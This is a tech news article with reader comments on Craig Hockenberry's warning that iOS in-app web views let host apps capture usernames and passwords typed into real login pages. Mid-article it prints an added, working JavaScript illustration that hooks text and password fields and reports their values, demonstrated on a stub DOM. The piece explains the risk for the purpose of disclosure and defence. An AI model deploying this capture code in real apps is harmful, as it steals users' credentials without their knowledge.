
App developer warns not to enter personal info using in-app browsers due to security issue

Proof-of-concept video: https://www.youtube.com/watch?v=2Bl-pJBHYuc

App developer Craig Hockenberry has published an article today titled “in-app browsers considered harmful”, warning both developers and users about a security issue in apps that load web pages in their own in-app browser view. “Would it surprise you to know that every one of those apps could eavesdrop on your typing? Even when it’s in a secure login screen with a password field?”

Many apps send users to an in-app browser to do things like authenticate logins for associated services. Think logging into an app using your Facebook or Twitter credentials, as highlighted in the proof-of-concept video above. You might assume that is as safe as doing so in Safari, but Hockenberry notes that, unlike Safari, the app hosting the web view can easily capture your username and password as you type them:

This is not phishing: the site shown is the actual Twitter website. This technique can be applied to any site that has an input form. All the attacker needs to know can easily be obtained by viewing the public facing HTML on the site… The app is stealing your username and password by watching what you type on the site. There’s nothing the site owner can do about this, since the web view has control over JavaScript that runs in the browser.
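The mechanism in that quote, as an added illustration rather than code from Hockenberry’s article or from Twitterrific: a host app runs JavaScript inside the page it loaded, and that script has the same DOM access as the page’s own scripts, so it can read every input field, including `type="password"` fields (the masking is only visual). On iOS 7 and 8 an app would run such a script through UIWebView’s `stringByEvaluatingJavaScriptFromString:`; the `report` callback standing in for the app-side transport, the stub DOM classes, and the field names are all assumptions made so the example runs offline under Node.

```javascript
// Added illustration (not the article's code). The capture logic is what a
// host app could run inside its web view; the stub DOM below is constructed so
// the example runs offline under Node instead of in a real page.

function installKeystrokeCapture(doc, report) {
  // Same selectors the page's own scripts could use; the web view host is
  // not a different origin, it *is* the page as far as the DOM is concerned.
  const selector = 'input[type="text"], input[type="email"], input[type="password"]';
  const fields = doc.querySelectorAll(selector);
  for (const field of fields) {
    field.addEventListener('input', () => {
      // `report` stands in for the app-side channel (custom URL scheme,
      // polling a JS variable, ...) that a real host app would use.
      report({ name: field.name, type: field.type, value: field.value });
    });
  }
  return fields.length; // number of fields now being watched
}

// --- constructed stand-in for a login page's DOM (assumption, not Twitter's markup) ---
// Field names are illustrative; an attacker reads the real ones off the site's HTML.
class StubInput {
  constructor(name, type) {
    this.name = name;
    this.type = type;
    this.value = '';
    this.listeners = [];
  }
  addEventListener(event, fn) {
    if (event === 'input') this.listeners.push(fn);
  }
  press(ch) { // simulate the user typing one character
    this.value += ch;
    for (const fn of this.listeners) fn();
  }
}

class StubDocument {
  constructor(inputs) { this.inputs = inputs; }
  querySelectorAll(selector) {
    // just enough selector support for the attribute filters used above
    const types = [...selector.matchAll(/type="([a-z]+)"/g)].map(m => m[1]);
    return this.inputs.filter(i => types.includes(i.type));
  }
}

function demo() {
  const user = new StubInput('username', 'text');
  const pass = new StubInput('password', 'password');
  const token = new StubInput('authenticity_token', 'hidden'); // not matched
  const doc = new StubDocument([user, pass, token]);
  const captured = [];
  const watched = installKeystrokeCapture(doc, rec => captured.push(rec));
  for (const ch of 'alice') user.press(ch);   // constructed sample input
  for (const ch of 'hunter2') pass.press(ch);  // constructed sample input
  return { watched, captured };
}

console.log(JSON.stringify(demo().captured.slice(-1)[0]));
```

Nothing in the page can block this: the listener is attached by the same runtime that executes the site’s own JavaScript, which is why Hockenberry says the fix is to move the login out of the app’s web view and into Safari (or a native API call) rather than anything the site owner can change.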

Hockenberry says the technique was tested on iOS 7 and iOS 8, and that it is the reason his company’s app Twitterrific “did its token exchange in Safari, even though it’s a more complex user interaction and a more difficult technical implementation.” Doing the login in Safari isn’t something Apple’s App Review procedures require, however, and users may assume an in-app browser view is as secure as Safari:

Unfortunately, Apple’s current App Review policy does not agree with this recommendation or with Twitterrific’s previous implementation. This is why our update for iOS 8 was delayed—it was the first time since the launch of the App Store that we haven’t had a new version on release day.

The article doesn’t offer Apple a clear fix. Hockenberry notes that addressing the core issue in WebKit and UIWebView would mean “Apple would need to release a new version of iOS for each version that included Safari and WebKit”, and stresses that it is not a bug in the browser engine: “No, this is not a WebKit bug… The problem is that an iOS app has as much access to these technologies as the developer of the web page.”

For now, Hockenberry suggests users avoid typing sensitive username or password information in an in-app browser view.


Comments

  1. chrisw52 - 10 years ago

    Reblogged this on conedogers and commented:
    Well… This is a pretty serious problem or oversight on Apple’s part. Or is it? On the one hand, the web view offers the same access as the web developer, as I would expect as an iOS developer. This allows the app designer total control over the app login sequence on a web page. I think the real bug here is from the app using the incorrect version of the web app interface. Instead of using a web view to launch a page that allows total exposure of the login process, why not use the Twitter-published API instead? Sure, it’s a bit more work on the developer’s side, but it is also more secure than using a web view. For me this falls under using best practices while developing an app.

    This problem isn’t exclusively unique to iOS; if you try hard enough, it can be done on the desktop with Safari or Chrome extensions and under Internet Explorer with their browser helper objects.

    Kudos to the article’s author for pointing this problem out. It’s an easy problem to avoid: just use the right technology to log in with your mobile application.

  2. chrisw52 - 10 years ago

    Nice article. This problem is not exclusively a problem with Safari on iOS. I think this really falls under programming best practices, and how to code your app with security in mind. The best way to avoid this bug would be to issue the login directly through an HTTP connection in your app, and not via a web view loading a login page.

    Thanks for pointing out this issue.

    • Did I read this wrong? Or did you? He’s saying Safari is fine. In-app browsers are the issue.

      • chrisw52 - 10 years ago

        You didn’t read it wrong. You can get the same access in Safari, Chrome and other browsers through plugins. A plugin for the browser, like Flash, has the same access to JavaScript as a web view in iOS.

  3. Damn Tastic - 10 years ago

    I have a feeling Tim Cook will be at work this weekend!

  4. I’m too old to know anything about coding or app development or anything like that, but it’s getting worrisome that every day I’m reading about insecurities with just about everything. From viruses being intentionally released by evildoers, to flaws in various systems that could lead to improper behaviour by the aforementioned evildoers. I know there’ll always be crime, but when the overabundance of it makes me long for the mid-twentieth century before tech, it’s a little disheartening.

  5. Vulnerabilities of web technology and the tools to browse the www with are something that will always be. It’s an ongoing process of finding holes, patching them and moving on. The safest internet is the offline internet.

    But as a mobile app dev I feel that bringing the safest experience to our users is important. We can only keep up with the latest info and choose the best and safest solution. Investing time in giving the better and safer solution will help your app in the long run (since these kinds of messages will keep frightening people and give hackers room to abuse known technical weaknesses).

    So I agree, it is a matter of applying the safest available solutions and the best development paradigms to keep things safe. The safety is only as safe as its weakest link, and using a weak link like a web view will not make things safer…

Author

Jordan Kahn

Jordan writes about all things Apple as Senior Editor of 9to5Mac, & contributes to 9to5Google, 9to5Toys, & Electrek.co. He also co-authors 9to5Mac’s Logic Pros series.